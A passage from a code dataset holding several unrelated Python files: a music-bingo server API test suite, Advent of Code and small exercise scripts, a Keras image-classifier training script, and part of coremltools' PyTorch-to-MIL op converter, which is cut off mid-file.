'text': '',\n 'pct': 100.0,\n 'phase': 1,\n 'numPhases': 1,\n 'done': True,\n 'success': False\n }\n for part in parser.parse():\n data = json.loads(part)\n if data['done']:\n # self.maxDiff = None\n self.assertIn('errors', data)\n self.assertEqual(data['errors'][0], expected['errors'][0])\n # avoid making assumptions about the exact text output from the\n # fastjson library\n expected['errors'] = data['errors']\n self.assertDictEqual(expected, data)\n\nclass TestImportDatabase(ServerTestCaseBase):\n \"\"\"\n Test importing database\n \"\"\"\n FIXTURE: Optional[str] = None\n\n def create_app(self):\n app = super().create_app()\n with models.db.session_scope() as dbs:\n admin = User(username=\"admin\",\n password=\"$2b$12$H8xhXO1D1t74YL2Ya2s6O.Kw7jGvWQjKci1y4E7L8ZAgrFE2EAanW\",\n email=\"admin@music.bingo\",\n groups_mask=1073741825)\n dbs.add(admin)\n user = User(username=\"user\",\n password=\"$2b$12$CMqbfc75fgPwQYfAsUvqo.x/G7/5uqTAiKKU6/R/MS.6sfyXHmcI2\",\n email=\"user@unit.test\",\n groups_mask=1)\n dbs.add(user)\n return app\n\n def test_import_not_admin(self):\n \"\"\"\n Test import of database file when not an admin\n \"\"\"\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/database',\n json={\n \"filename\": \"tv-themes-v4.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"content-type\": 'application/json',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n # force reading of data from server\n response.raw.read()\n\n def test_import_v4_database(self):\n \"\"\"\n Test import of a v4 database file\n \"\"\"\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n data = json.load(src)\n api_url = self.get_server_url()\n response = self.session.put(\n f'{api_url}/api/database',\n json={\n \"filename\": \"tv-themes-v4.json\",\n \"data\": data\n },\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"Accept\": 'application/json',\n \"content-type\": 'application/json',\n },\n stream=True\n )\n self.assert200(response)\n self.assertNoCache(response)\n content_type = response.headers['Content-Type']\n self.assertTrue(content_type.startswith('multipart/'))\n pos = content_type.index('; boundary=')\n boundary = content_type[pos + len('; boundary='):]\n parser = MultipartMixedParser(bytes(boundary, 'utf-8'), response)\n for part in parser.parse():\n data = json.loads(part)\n if data['done']:\n self.assertListEqual(data['errors'], [])\n self.assertEqual(data['success'], True)\n added = {\n \"User\": 0,\n \"Directory\": 1,\n \"Album\": 5,\n \"Artist\": 9,\n \"Song\": 71,\n \"Track\": 50,\n \"BingoTicket\": 24,\n \"Game\": 1\n }\n self.assertDictEqual(added, data['added'])\n\nclass TestExportDatabase(ServerTestCaseBase):\n \"\"\"\n Test exporting database\n \"\"\"\n def test_export_v5_database(self) -> None:\n \"\"\"\n Test export of a v5 database file\n \"\"\"\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json()['accessToken']\n api_url = self.get_server_url()\n response = self.session.get(\n f'{api_url}/api/database',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n \"Accept\": 'application/json',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n content_type = response.headers['Content-Type']\n self.assertTrue(content_type.startswith('application/json'))\n try:\n data : JsonObject = response.json()\n except json.decoder.JSONDecodeError:\n print(response.data)\n raise\n #with open(\"exported-tv-themes-v5.json\", 'wt') as dst:\n # json.dump(data, dst, indent=' ', default=utils.flatten)\n json_filename = fixture_filename(\"exported-tv-themes-v5.json\")\n with json_filename.open('rt', encoding='utf-8') as src:\n expected = json.load(src)\n admin: Optional[JsonObject] = None\n for user in cast(List[JsonObject], data['Users']):\n if user['username'] == 'admin':\n admin = user\n break\n self.assertIsNotNone(admin)\n for user in cast(List[JsonObject], expected['Users']):\n if user['username'] == 'admin':\n user['last_login'] = cast(JsonObject, admin)['last_login']\n # self.maxDiff = None\n for table in ['Users', 'Artists', 'Directories', 'Songs',\n 'Games', 'Tracks', 'BingoTickets']:\n items = {}\n for item in data[table]:\n items[item['pk']] = item\n actual = []\n for item in expected[table]:\n actual.append(items[item['pk']])\n self.assertModelListEqual(actual, expected[table], table)\n\nclass TestSettingsApi(ServerBaseTestCase):\n \"\"\"\n Test settings server APIs\n \"\"\"\n def setUp(self) -> None:\n super().setUp()\n json_filename = fixture_filename(\"tv-themes-v4.json\")\n with models.db.session_scope() as dbs:\n imp = Importer(self.options(), dbs, Progress())\n imp.import_database(json_filename)\n\n def test_translate_options(self) -> None:\n \"\"\"\n Test translating options to JSON\n \"\"\"\n class TestOptions(DatabaseOptions):\n \"\"\"\"\n Version of DatabaseOptions that doesn't try to load environment variables\n \"\"\"\n def load_environment_settings(self) -> None:\n \"\"\"\n Check environment for database settings\n \"\"\"\n return\n\n db_opts = TestOptions(database_name=\"bingo.db3\", database_provider=\"sqlite\")\n expected: List[JsonObject] = [{\n \"help\": \"Timeout (in seconds) when connecting to database\",\n \"name\": \"connect_timeout\",\n \"title\": \"Connect Timeout\",\n \"value\": None,\n \"type\": \"int\",\n \"minValue\": 1,\n \"maxValue\": 3600\n }, {\n \"help\": \"Create database if not found (sqlite only)\",\n \"name\": \"create_db\",\n \"title\": \"Create Db\",\n \"value\": True,\n \"type\": \"bool\"\n }, {\n \"help\": \"Database driver\",\n \"name\": \"driver\",\n \"title\": \"Driver\",\n \"value\": None,\n \"type\": \"text\"\n }, {\n \"help\": \"Database name (or filename for sqlite)\",\n \"name\": \"name\",\n \"title\": \"Name\",\n \"value\": \"bingo.db3\",\n \"type\": \"text\"\n }, {\n \"help\": \"Hostname of database server\",\n \"name\": \"host\",\n \"title\": \"Host\",\n \"value\": None,\n \"type\": \"text\"\n }, {\n \"help\": \"Password for connecting to database\",\n \"name\": \"passwd\",\n \"title\": \"Passwd\",\n \"value\": None,\n \"type\": \"text\"\n }, {\n \"help\": \"Port to use to connect to database\",\n \"name\": \"port\",\n \"title\": \"Port\",\n \"value\": None,\n \"type\": \"int\",\n \"minValue\": 1,\n \"maxValue\": 65535\n }, {\n \"help\": \"Database provider (sqlite, mysql) [%(default)s]\",\n \"name\": \"provider\",\n \"title\": \"Provider\",\n \"value\": \"sqlite\",\n \"type\": \"text\"\n }, {\n \"help\": \"TLS options\",\n \"name\": \"ssl\",\n \"title\": \"Ssl\",\n \"value\": None,\n \"type\": \"json\"\n }, {\n \"help\": \"Username for connecting to database\",\n \"name\": \"user\",\n \"title\": \"User\",\n \"value\": None,\n \"type\": \"text\"\n }]\n actual = SettingsApi.translate_options(db_opts)\n self.assertListEqual(expected, actual)\n\n def test_get_settings(self) -> None:\n \"\"\"\n Test get current settings\n \"\"\"\n opts = self.options()\n # check request without bearer token only returns privacy policy\n with self.client:\n response = self.client.get('/api/settings')\n self.assert200(response)\n self.assertNoCache(response)\n expected = {\n 'privacy': SettingsApi.translate_options(opts.privacy),\n }\n self.assertDictEqual(response.json, expected)\n # check request for non-admin user\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertIn('accessToken', data)\n access_token = data['accessToken']\n response = self.client.get('/api/settings')\n self.assert200(response)\n self.assertNoCache(response)\n expected = {\n 'privacy': SettingsApi.translate_options(opts.privacy),\n }\n self.assertDictEqual(response.json, expected)\n self.logout_user(access_token)\n with self.client:\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n expected = {\n 'app': SettingsApi.translate_options(opts),\n }\n for ext_cls in opts.EXTRA_OPTIONS:\n ext_opts = cast(ExtraOptions,\n getattr(opts, ext_cls.LONG_PREFIX))\n expected[ext_cls.LONG_PREFIX] = SettingsApi.translate_options(ext_opts)\n with self.client:\n response = self.client.get(\n '/api/settings',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n self.assertDictEqual(response.json, expected)\n\n def test_modify_settings(self) -> None:\n \"\"\"\n Test modify current settings\n \"\"\"\n before = self.options().to_dict()\n changes: JsonObject = {\n 'app': {\n 'bitrate': 128,\n 'colour_scheme': 'PRIDE',\n 'doc_per_page': True,\n 'game_name_template': 'bingo-{game_id}.json',\n 'max_tickets_per_user': 4,\n },\n 'smtp': {\n 'port': 123,\n },\n 'database': {\n 'driver': 'dbDriver',\n },\n 'privacy': {\n 'ico': 'https://ico.url',\n },\n }\n # check request without bearer token is rejected\n with self.client:\n response = self.client.post(\n '/api/settings',\n data=json.dumps(changes),\n content_type='application/json',\n )\n self.assert401(response)\n self.assertNoCache(response)\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n # check request for non-admin user is rejected\n with self.client:\n response = self.client.post(\n '/api/settings',\n data=json.dumps(changes),\n headers={\n \"Authorization\": f'Bearer {access_token}',\n },\n content_type='application/json',\n )\n self.assertEqual(response.status_code, 401)\n self.logout_user(access_token)\n with self.client:\n response = self.login_user('admin', 'adm!n')\n self.assert200(response)\n self.assertNoCache(response)\n access_token = response.json['accessToken']\n # check request for admin user works correctly\n with self.client:\n response = self.client.post(\n '/api/settings',\n data=json.dumps(changes),\n headers={\n \"Authorization\": f'Bearer {access_token}',\n },\n content_type='application/json',\n )\n self.assertEqual(response.status_code, 200)\n expected_response = {\n 'success': True,\n 'changes': [\n 'app.bitrate',\n 'app.colour_scheme',\n 'app.doc_per_page',\n 'app.game_name_template',\n 'app.max_tickets_per_user',\n 'database.driver',\n 'privacy.ico',\n 'smtp.port',\n ]\n }\n self.assertDictEqual(response.json, expected_response)\n opts = self.options().to_dict()\n changes['app']['colour_scheme'] = Palette.from_string(changes['app']['colour_scheme'])\n for name, value in changes['app'].items():\n self.assertEqual(opts[name], value)\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n for name, value in before.items():\n if name in changes['app']:\n continue\n if name in Options.EXTRA_OPTIONS_NAMES:\n continue\n self.assertEqual(value, opts[name])\n for section in Options.EXTRA_OPTIONS_NAMES:\n for name, value in changes[section].items():\n self.assertEqual(opts[section][name], value)\n for name, value in before[section].items():\n if name in changes[section]:\n continue\n self.assertEqual(value, opts[section][name])\n\nclass TestCssApi(ServerBaseTestCase):\n \"\"\"\n Test CSS API\n \"\"\"\n def test_get_themes_css(self) -> None:\n \"\"\"\n Test getting the themes.css file and that it matches Palette\n \"\"\"\n with self.client:\n response = self.client.get('/api/css/themes.css')\n self.assert200(response)\n charset_re = re.compile(r'charset=([^ ;$]+)')\n match = charset_re.search(response.headers['Content-Type'])\n self.assertIsNotNone(match)\n assert match is not None # tells mypy that value cannot be None\n rules, _ = tinycss2.parse_stylesheet_bytes(\n css_bytes=response.get_data(),\n protocol_encoding=match.group(1))\n found: Set[str] = set()\n for rule in rules:\n if rule.type == 'whitespace':\n continue\n for item in rule.prelude:\n if not isinstance(item, tinycss2.ast.IdentToken):\n continue\n if not item.value.endswith(r'-theme'):\n continue\n theme = item.value[:-len(r'-theme')].upper()\n self.assertIn(theme, Palette.names())\n # TODO: add check that RGB values match entries in Palette\n found.add(theme)\n for name in Palette.names():\n self.assertIn(name, found, f'Missing style entry for {name}')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"asrashley/music-bingo","sub_path":"musicbingo/tests/test_server_api.py","file_name":"test_server_api.py","file_ext":"py","file_size_in_byte":58420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"28913371935","text":"from copy import deepcopy\nfrom typing import List, Tuple, Dict\n\nfrom day_9 import solution as int_code\n\n\ndef get_tiles(outputs: List[int]) -> List[List[int]]:\n return [[outputs[i], outputs[i + 1], outputs[i + 2]] for i in range(len(outputs))[::3]]\n\n\ndef get_quantity_of_blocks(tiles: List[List[int]]) -> int:\n return [tile[2] for tile in tiles].count(2)\n\n\ndef get_ball_direction(ball_positions: List[Tuple[int, int]]) -> int:\n return ball_positions[-1][1] - ball_positions[-2][1]\n\n\ndef update_positions(positions: Dict[int, Tuple[int, int]], tiles: List[List[int]]):\n for tile in tiles:\n if tile[2] in (3, 4):\n positions[tile[2]] = (tile[0], tile[1])\n\n\ndef get_next_joystick_position(positions: Dict[int, Tuple[int, int]],\n state: Tuple[int, int, List[int], List[int], List[int], bool]) -> int:\n ball_position = positions.get(4)\n\n while ball_position[1] < 21 and state[5]:\n state = int_code.run_program(state[0], state[1], state[2], [0])\n tiles = get_tiles(state[4])\n update_positions(positions, tiles)\n ball_position = positions.get(4)\n\n return ball_position[0]\n\n\ndef run_game(integers: List[int], tiles: List[List[int]]) -> int:\n positions = dict()\n update_positions(positions, tiles)\n\n ball_positions = [positions.get(4)]\n joystick_position = positions.get(3)[0]\n next_joystick_position = joystick_position\n\n integers[0] = 2\n state = (0, 0, integers, [0], [], True)\n\n while state[5]:\n state = int_code.run_program(state[0], state[1], state[2], state[3])\n tiles = get_tiles(state[4])\n update_positions(positions, tiles)\n\n joystick_position = positions.get(3)[0]\n ball_position = positions.get(4)\n ball_positions.append(ball_position)\n ball_direction = get_ball_direction(ball_positions)\n\n if ball_position[1] == 20 and ball_direction == -1:\n next_joystick_position = get_next_joystick_position(deepcopy(positions), deepcopy(state))\n\n state[3].append((next_joystick_position > joystick_position) - (joystick_position > next_joystick_position))\n\n return next(tile[2] for tile in tiles if tile[0] == -1 and tile[1] == 0)\n\n\ndef part_1(filename: str) -> int:\n with open(filename) as file:\n integers = [int(i) for i in file.read().split(',')]\n outputs = int_code.run_program(0, 0, integers, [])[4]\n tiles = get_tiles(outputs)\n return get_quantity_of_blocks(tiles)\n\n\ndef part_2(filename: str) -> int:\n with open(filename) as file:\n integers = [int(i) for i in file.read().split(',')]\n outputs = int_code.run_program(0, 0, integers, [])[4]\n tiles = get_tiles(outputs)\n return run_game(integers.copy(), tiles.copy())\n\n\nprint(f\"Day 13 (Part 1) - Answer: {part_1('input.txt')}\")\nprint(f\"Day 13 (Part 2) - Answer: {part_2('input.txt')}\")\n","repo_name":"DavidMendozaMartinez/Advent-of-Code-2019","sub_path":"day_13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"7452140513","text":"import matplotlib.pyplot as plt \nSPORTS = ['FOOTBALL', 'CRICKET', 'BADMINTON', 'BASKETBALL'] \nslices = [7, 6, 5, 3] \ncolors = ['y', 'r', 'g', 'b'] \nplt.pie(slices, labels = SPORTS, colors=colors, \n startangle=90, shadow = True, explode = (0, 0, 0.1, 0), \n radius = 1.2, autopct = '%1.1f%%') \n \nplt.legend() \n \n\nplt.show() ","repo_name":"kshitizpathak2000/python_collegelabop","sub_path":"graph4b.py","file_name":"graph4b.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32483031677","text":"from itertools import groupby\n\n\ndef decode(string):\n number = ''\n str_decoded = ''\n for char in string:\n if char.isdigit():\n number += char\n else:\n if number:\n str_decoded += char * int(number)\n number = ''\n else:\n str_decoded += char\n\n return str_decoded\n\n\ndef encode(string):\n str_encoded = ''\n my_list = [list(g) for k, g in groupby(string)]\n for group in my_list:\n g = ''.join(group)\n number = str(g.count(group[0])) if (g.count(group[0]) > 1) else ''\n str_encoded += number + group[0]\n return str_encoded\n\n","repo_name":"Riverfount/exercism","sub_path":"python/run-length-encoding/run_length_encoding.py","file_name":"run_length_encoding.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33485965814","text":"\"\"\"\n函数\n def 函数名(参数):\n 函数体\n return 返回值\n\"\"\"\n\n\n# 附带函数的文档说明\ndef add(m, n):\n \"\"\"\n 加法运算\n :param m: 任意数字\n :param n: 任意数字\n :return: 数字相加的和\n \"\"\"\n res = m + n\n return res\n\n\nx = add(2, 4)\nprint(x)\n\n# 函数内修改全局变量\nnum = 100\n\n\ndef func_a():\n global num\n num = 500\n\n\nfunc_a()\nprint(num) # 500\n","repo_name":"kanzaki-t/python","sub_path":"01_基础/09_函数.py","file_name":"09_函数.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71364718224","text":"import sys\ninput = sys.stdin.readline\n\nn, t = map(int, input().split())\n\nans = [[0 for _ in range(t+1)] for _ in range(n)]\n\nfor i in range(n):\n k, s = map(int, input().split())\n for j in range(1, t + 1):\n if j >= k:\n ans[i][j] = max(ans[i - 1][j], ans[i - 1][j - k] + s)\n else:\n ans[i][j] = ans[i - 1][j]\nprint(max(ans[-1]))","repo_name":"CodeTest-StudyGroup/Code-Test-Study","sub_path":"JongHo/BOJ/14728.py","file_name":"14728.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1095,"dataset":"github-code","pt":"47"} +{"seq_id":"72380330384","text":"from __future__ import print_function\nfrom configs import train_path, test_path\nimport keras\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport os\n\nbatch_size = 40\nnum_classes = 2\nepochs = 30\ndata_augmentation = True\nsave_dir = os.path.join(os.getcwd(), 'archive')\nmodel_name = 'kerasfoodsmall-mRMS.h5'\n\n# Optimizers\nopt1 = keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6)\nopt3 = keras.optimizers.Adagrad(learning_rate=0.01)\nopt5 = keras.optimizers.Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, amsgrad=False)\n\n# Added parameters\ndense_layers = [1, 2]\nlayer_sizes = [32, 64]\n#optimzers = [opt1, opt3, opt5]\n\nmodel_path = os.path.join(save_dir, model_name)\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n directory=train_path,\n target_size=(128, 128),\n color_mode='rgb',\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=True,\n seed = 1)\n\ntest_generator = test_datagen.flow_from_directory(\n directory=test_path,\n target_size=(128, 128),\n batch_size=batch_size,\n class_mode='categorical')\n\nfor dense_layer in dense_layers:\n for layer_size in layer_sizes:\n\n namedir = \"Optimizedmodel-RMS-optimizer-{}-nodes-{}-dense\".format( layer_size, dense_layer)\n tensorboard_callback = keras.callbacks.TensorBoard(log_dir='foodsmallmodifiedruns1\\{}'.format(namedir))\n model = Sequential()\n\n model.add(Conv2D(32, (3, 3), padding='same', input_shape=(128,128,3)))\n model.add(Activation('relu'))\n\n model.add(Conv2D(32, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64, (3, 3), padding='same'))\n model.add(Activation('relu'))\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n \n for _ in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n \n model.add(Dropout(0.5))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n\n opt = opt1 # RMSprop optimizer\n #opt = opt3 # Adagrad optimizer\n #opt = opt5 # Adma optimizer\n\n if os.path.exists(model_path):\n print(\"LOADING OLD MODEL\")\n model.load_weights(model_path)\n\n model.compile(loss= 'categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\n model.fit_generator(train_generator,\n epochs=epochs,\n steps_per_epoch=batch_size, # Specfiying batch size\n validation_data=test_generator,\n callbacks=[tensorboard_callback])\n\n\nmodel.save(model_path)\n","repo_name":"alex-g-tejada/Convolution-Food","sub_path":"kerasmain-modified.py","file_name":"kerasmain-modified.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7861238408","text":"import builtins\nimport math as _math\nimport numbers\nimport re\nfrom collections.abc import Iterable\nfrom typing import Any, List, Optional, Tuple\n\nimport numpy as _np\nimport numpy as np\nimport torch\nfrom tqdm import tqdm as _tqdm\n\nfrom coremltools import _logger as logger\nfrom coremltools.converters.mil._deployment_compatibility import AvailableTarget as target\nfrom coremltools.converters.mil.mil import Builder as mb\nfrom coremltools.converters.mil.mil import Symbol, types\nfrom coremltools.converters.mil.mil.block import is_current_opset_version_compatible_with\nfrom coremltools.converters.mil.mil.ops.defs._utils import (\n MAX_SIZE_CONSTANT_FOLDING,\n promote_input_dtypes,\n solve_slice_by_index_shape,\n)\nfrom coremltools.converters.mil.mil.types import is_bool, nptype_from_builtin\nfrom coremltools.converters.mil.mil.types.symbolic import any_symbolic, is_symbolic\nfrom coremltools.converters.mil.mil.types.type_mapping import builtin_to_string\nfrom coremltools.converters.mil.mil.var import ListVar, Var\n\nfrom .._utils import build_einsum_mil, value_at\nfrom .torch_op_registry import _TORCH_OPS_REGISTRY, register_torch_op\n\n# The pytorch args for many of the below ops were sourced from\n# https://github.com/pytorch/pytorch/blob/d971007c291c0ead1003d12cd553d18ddb582207/torch/csrc/jit/mobile/register_mobile_ops.cpp#L216\n\n\n# Max int64 value. Used as a default value in many PyTorch functions.\nPYTORCH_DEFAULT_VALUE = 2**63 - 1\n\nVALUE_CLOSE_TO_INFINITY = 1e+38\n\n\ndef _all_outputs_present(context, graph):\n \"\"\"\n Returns true if all the symbols in the graph's output list are\n present in context.\n \"\"\"\n for outp in graph.outputs:\n try:\n context[outp]\n except ValueError:\n return False\n return True\n\n\ndef convert_nodes(context, graph):\n \"\"\"\n Iterate over the nodes of a graph or block and convert to MIL.\n\n Arguments:\n context: A TranscriptionContext object to pull node inputs and\n assign node outputs.\n graph: An InternalTorchIRGraph or InternalTorchIRBlock object.\n \"\"\"\n for node in _tqdm(graph.nodes, desc=\"Converting PyTorch Frontend ==> MIL Ops\", unit=\" ops\"):\n op_lookup = node.kind\n add_op = _TORCH_OPS_REGISTRY.get_func(op_lookup)\n if add_op is None:\n if re.match(r\".*_dynamic\", op_lookup):\n raise RuntimeError(\n f\"PyTorch convert function for op '{op_lookup}' not implemented.\\n\"\n \"Dynamic quantized models are not supported by Core ML.\\n\"\n \"Please use static quantization or the APIs in coremltools.optimize to quantize/compress models.\"\n )\n else:\n raise RuntimeError(\n f\"PyTorch convert function for op '{op_lookup}' not implemented.\"\n )\n\n logger.info(\"Converting op {} : {}\".format(node.name, op_lookup))\n\n context.quant_context.maybe_handle_quantized_inputs(node)\n context.prepare_for_conversion(node)\n\n add_op(context, node)\n\n if _TORCH_OPS_REGISTRY.is_inplace_op(op_lookup):\n context.process_inplace_op(node)\n\n # We've generated all the outputs the graph needs, terminate conversion.\n if _all_outputs_present(context, graph):\n break\n\n\ndef convert_block(context, block, inputs):\n \"\"\"Convert a block (sub-graph) to MIL. Conversion happens within a new\n context frame.\n\n Arguments:\n context: A TranscriptionContext object to pull node inputs and\n assign node outputs.\n block: An InternalTorchIRBlock object.\n inputs: List of Vars from the outer context that map to the block's\n expected inputs. The number of inputs provided must match the\n number expected by the block.\n \"\"\"\n\n assert len(block.inputs) == len(inputs)\n\n # Start a new context frame.\n context.push((block.inputs, inputs))\n\n # Add the block ops.\n convert_nodes(context, block)\n\n # Collect the block outputs.\n outputs = [context[outp] for outp in block.outputs]\n\n # Return to the previous context frame.\n context.pop()\n return outputs\n\n\n# Some ops will receive a dtype input as an integer\n# which maps to a torch dtype. The below mapping was found by\n# converting test models with different dtypes passed to ones.\nNUM_TO_TORCH_DTYPE = {\n 0: torch.uint8,\n 1: torch.int8,\n 2: torch.int16,\n 3: torch.int32,\n 4: torch.int32,\n 5: torch.float16,\n 6: torch.float32,\n 7: torch.float32,\n 11: torch.bool,\n 12: torch.qint8,\n 13: torch.quint8,\n 14: torch.qint32,\n}\n\nTORCH_DTYPE_TO_NUM = {\n dtype: val for val, dtype in NUM_TO_TORCH_DTYPE.items()\n}\n\nNUMPY_DTYPE_TO_TORCH_NUM = {\n _np.uint8: 0,\n _np.int8: 1,\n _np.int16: 2,\n _np.int32: 3,\n _np.int64: 4,\n _np.float16: 5,\n _np.float32: 6,\n _np.float64: 7,\n bool: 11,\n}\n\nNUM_TO_NUMPY_DTYPE = {\n 0: _np.uint8,\n 1: _np.int8,\n 2: _np.int16,\n 3: _np.int32,\n 4: _np.int32,\n 5: _np.float16,\n 6: _np.float32,\n 7: _np.float32,\n 11: bool,\n}\n\nNUM_TO_DTYPE_STRING = {\n 2: \"int16\",\n 3: \"int32\",\n 4: \"int32\",\n 5: \"fp16\",\n 6: \"fp32\",\n 7: \"fp32\",\n 11: \"bool\",\n}\n\nTYPE_TO_DTYPE_STRING = {\n types.bool: \"bool\",\n types.fp16: \"fp16\",\n types.fp32: \"fp32\",\n types.int32: \"int32\",\n}\n\n\ndef _get_inputs(context, node, expected=None, min_expected=None) -> List[Var]:\n \"\"\"\n Look up a node's inputs in @context and return them as a list. If\n @expected is not None, also verifies the number of inputs matches the\n value of @expected.\n \"\"\"\n\n def get_bindings(alist) -> List[Any]:\n \"\"\"\n This utility is needed in order to handle following cases:\n With EdgeIR,\n - Some of the inputs can be literals (like axis, perms) and thus can be of types: list, int etc.\n - An Input Parameter of an op could be a list/tuple similar to our concat layer\n \"\"\"\n results = []\n\n for i in alist:\n if isinstance(i, str):\n results.append(context[i])\n elif isinstance(i, (list, tuple)) and all(isinstance(j, int) for j in i):\n results.append(mb.const(val=i))\n elif isinstance(i, (list, tuple)):\n results.append(get_bindings(i))\n elif isinstance(i, (int, float)):\n results.append(mb.const(val=i))\n elif i is None:\n results.append(None)\n else:\n raise NotImplementedError(f\"Binding of inputs of type {type(i)} not handled yet\")\n\n return results\n\n inputs = get_bindings(node.inputs)\n\n if expected is not None:\n expected = [expected] if not isinstance(expected, (list, tuple)) else expected\n\n if len(inputs) not in expected:\n raise ValueError(\n \"node {} ({}) got {} input(s), expected {}\".format(\n node.name, node.kind, len(inputs), expected\n )\n )\n if min_expected is not None:\n if len(inputs) < min_expected:\n raise ValueError(\n \"node {} ({}) got {} input(s), expected minimum {} inputs\".format(\n node.name, node.kind, len(inputs), min_expected\n )\n )\n\n return inputs\n\n\ndef _list_select(shape_var, index):\n \"\"\"\n Sometimes we need to select a specific item from a list. If that item\n is known at compile time, extract it as a const. Otherwise, if it's\n symbolic, use gather.\n \"\"\"\n if shape_var.can_be_folded_to_const():\n res = mb.const(val=shape_var.val[index])\n else:\n if is_current_opset_version_compatible_with(target.iOS17):\n # IOS17 `gather` requires non-negative indices.\n index = mb.select(\n cond=mb.greater_equal(x=index, y=0),\n a=index,\n b=mb.add(x=index, y=value_at(mb.shape(x=shape_var), 0)),\n )\n res = mb.gather(x=shape_var, indices=index)\n return res\n\ndef _is_const(var, optional=False):\n \"\"\"\n Check if a var is a const.\n It could be `const` or `constexpr_` ops.\n \"\"\"\n if optional and var is None:\n return True\n if isinstance(var, np.ndarray):\n return True\n return var is not None and (var.val is not None or var.op.op_type.startswith(\"constexpr_\"))\n\ndef _create_linear_layer(x, w, bias):\n \"\"\"\n Utility to translate linear layer.\n Since the linear layer can only take `const` or `constexpr_` weight as input,\n for other cases, we implement the linear layer through matmul.\n\n For instance, given a torch model with an int8 weight:\n\n int8_weight -> transpose -> reshape -> linear\n\n If we directly use `mb.linear`, it is going to produce compilation error at the runtime.\n \"\"\"\n if _is_const(w) and _is_const(bias, optional=True):\n return mb.linear(x=x, weight=w, bias=bias)\n res = mb.matmul(x=x, y=w, transpose_y=True)\n if bias is not None:\n res = mb.add(x=res, y=bias)\n return res\n\ndef _construct_constant(val, name):\n # Converter cannot handle torch tensors.\n if isinstance(val, torch.Tensor):\n val = val.cpu().numpy()\n\n # MIL casts ints to int32, which can't represent PyTorch's default value.\n # So we instead represent it with None, and any ops that might get the\n # value will check for None instead.\n if isinstance(val, int) and val == PYTORCH_DEFAULT_VALUE:\n val = None\n\n # Pytorch uses inf\n if val is not None and isinstance(val, numbers.Number) and _np.isinf(val):\n if val < 0: # neg inf\n # most negative number in fp32\n val = -3.4e+38\n else: # positive inf\n val = 3.4e+38\n if val is None:\n return None\n else:\n return mb.const(val=val, name=name)\n\n\n@register_torch_op\ndef affine_grid_generator(context, node):\n # rdar://73165386 (Improve error handling of coremltools \"affine\" op PyTorch conversion.)\n\n affine_op_name = node.name\n theta, size, align_corners = _get_inputs(context, node, expected=3)\n\n # note: only add consts here as PyTorch uses affine_grid + grid_sampler together\n is_theta_const = theta.val is not None\n if is_theta_const:\n context.add(mb.const(val=theta.val, name=\"{}_theta\".format(affine_op_name)))\n else: # theta is dynamic input, keep track of it's name\n context.add(mb.const(val=theta.name, name=\"{}_theta\".format(affine_op_name)))\n\n context.add(mb.const(val=size.val, name=\"{}_size\".format(affine_op_name)))\n context.add(mb.const(val=align_corners.val, name=\"{}_align_corners\".format(affine_op_name)))\n\n\n@register_torch_op\ndef grid_sampler(context, node):\n affine_op_name = node.inputs[1]\n # 